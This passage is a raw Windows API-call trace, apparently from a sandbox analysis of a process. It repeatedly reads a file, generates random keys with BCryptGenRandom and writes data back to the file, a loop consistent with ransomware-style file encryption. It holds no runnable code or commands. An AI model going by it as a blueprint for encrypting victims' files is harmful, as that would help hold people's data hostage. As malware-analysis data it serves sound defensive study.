lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.772] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xed4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.773] CloseHandle (hObject=0x170) returned 1 [0195.773] free (_Block=0x3df0008) [0195.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.783] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.784] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0195.784] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.784] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0195.785] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.785] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.785] free (_Block=0x3e305b8) [0195.785] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.785] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.785] free (_Block=0x1fa91d0) [0195.785] free (_Block=0x1fa2ed8) [0195.785] free (_Block=0x1fa90b8) [0195.785] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.786] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.786] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.786] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.798] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf09, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.798] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.798] CloseHandle (hObject=0x170) returned 1 [0195.798] free (_Block=0x3df0008) [0195.798] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.808] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.808] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0195.808] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.809] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0195.809] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.809] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.809] free (_Block=0x3e305b8) [0195.809] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.809] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.810] free (_Block=0x1fa91d0) [0195.810] free (_Block=0x1fa2ed8) [0195.810] free (_Block=0x1fa90b8) [0195.810] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.810] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.822] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xeed, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.822] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.823] CloseHandle (hObject=0x170) returned 1 [0195.823] free (_Block=0x3df0008) [0195.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.834] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.835] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0195.835] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.835] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0195.836] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.836] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.836] free (_Block=0x3e305b8) [0195.836] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.836] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.836] free (_Block=0x1fa91d0) [0195.836] free (_Block=0x1fa2ed8) [0195.836] free (_Block=0x1fa90b8) [0195.836] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.837] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.837] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.837] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.860] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe05, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.860] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.861] CloseHandle (hObject=0x170) returned 1 [0195.861] free (_Block=0x3df0008) [0195.861] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.869] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0195.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.870] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0195.870] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.870] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.870] free (_Block=0x3e305b8) [0195.870] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.870] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.871] free (_Block=0x1fa91d0) [0195.871] free (_Block=0x1fa2ed8) [0195.871] free (_Block=0x1fa90b8) [0195.871] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.871] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.871] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.871] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.883] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe15, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.883] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.884] CloseHandle (hObject=0x170) returned 1 [0195.884] free (_Block=0x3df0008) [0195.884] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.955] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0195.956] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0195.957] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.957] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.957] free (_Block=0x3e305b8) [0195.957] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.957] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.957] free (_Block=0x1fa91d0) [0195.957] free (_Block=0x1fa2ed8) [0195.957] free (_Block=0x1fa90b8) [0195.957] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.958] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.958] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.958] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.969] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe20, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.970] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.970] CloseHandle (hObject=0x170) returned 1 [0195.970] free (_Block=0x3df0008) [0195.970] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.979] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.980] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0195.980] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.980] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0195.980] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.980] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.980] free (_Block=0x3e305b8) [0195.980] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.980] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.981] free (_Block=0x1fa91d0) [0195.981] free (_Block=0x1fa2ed8) [0195.981] free (_Block=0x1fa90b8) [0195.981] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.982] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.993] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe5a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.993] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0195.994] CloseHandle (hObject=0x170) returned 1 [0195.994] free (_Block=0x3df0008) [0195.994] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.002] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.003] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.003] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.003] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.004] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.004] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.004] free (_Block=0x3e305b8) [0196.004] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.004] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.004] free (_Block=0x1fa91d0) [0196.004] free (_Block=0x1fa2ed8) [0196.004] free (_Block=0x1fa90b8) [0196.004] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.005] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.005] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xef0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.005] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.016] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe2c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.017] CloseHandle (hObject=0x170) returned 1 [0196.017] free (_Block=0x3df0008) [0196.017] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.025] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.026] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.026] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.026] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.027] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.027] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.027] free (_Block=0x3e305b8) [0196.027] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.027] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.027] free (_Block=0x1fa91d0) [0196.027] free (_Block=0x1fa2ed8) [0196.027] free (_Block=0x1fa90b8) [0196.027] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.028] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.028] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.028] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.041] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe7f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.041] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.042] CloseHandle (hObject=0x170) returned 1 [0196.042] free (_Block=0x3df0008) [0196.042] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.060] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.060] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.060] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.060] calloc (_Count=0x40, _Size=0x4) returned 